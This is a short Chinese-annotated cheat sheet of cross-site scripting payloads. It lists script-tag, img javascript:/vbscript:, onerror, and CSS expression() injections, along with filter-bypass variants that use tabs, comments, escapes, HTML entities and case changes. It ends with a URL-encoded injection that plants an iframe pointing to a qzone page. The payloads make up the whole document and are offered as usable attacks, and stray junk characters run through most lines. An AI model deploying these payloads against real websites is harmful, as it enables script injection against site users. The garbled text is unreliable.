<script>alert("跨站")</script> (最常用)
: v3 W) g+ S6 u3 Q<img scr=javascript:alert("跨站")></img>
! N1 y6 ?5 `! K' q. v; i<img scr="javascript: alert(/跨站/)></img>. A! F& T( Z9 e* |
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
P0 P z4 @3 f' c" h3 d<img scr="#" onerror=alert(/跨站/)></img>
% |2 _6 _* \1 [8 o/ k7 G<img scr="#" style="xss:expression(alert(/xss/));"></img>; c& V W4 t- N3 B: W
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
# Y* Q0 g- w. ]- b5 a. R* e, F" E<img src=vbscript:msgbox ("xss")></img># O' y3 e' Y. W8 q% E' p
<style> input {left:expression (alert('xss'))}</style>
- X4 x; z0 V# [% I K<div style={left:expression (alert('xss'))}></div>
0 d' ~# e6 u/ H) m. ~ c<div style={left:exp/* */ression (alert('xss'))}></div>5 ?# ~9 S, q2 \ l: N
<div style={left:\0065\0078ression (alert('xss'))}></div>! M0 b% T8 M2 |# Y# D5 k. |( l
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
' S+ |6 F3 ]" x/ J [2 i; K1 Runicode <div style="{left:expRessioN (alert('xss'))}">& Q$ N1 `5 z) F4 m. {4 \
+ T7 T$ U% N- u3 R+ B: H) q& Z5 f
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
: |) E. W; a) X. ]8 V4 T |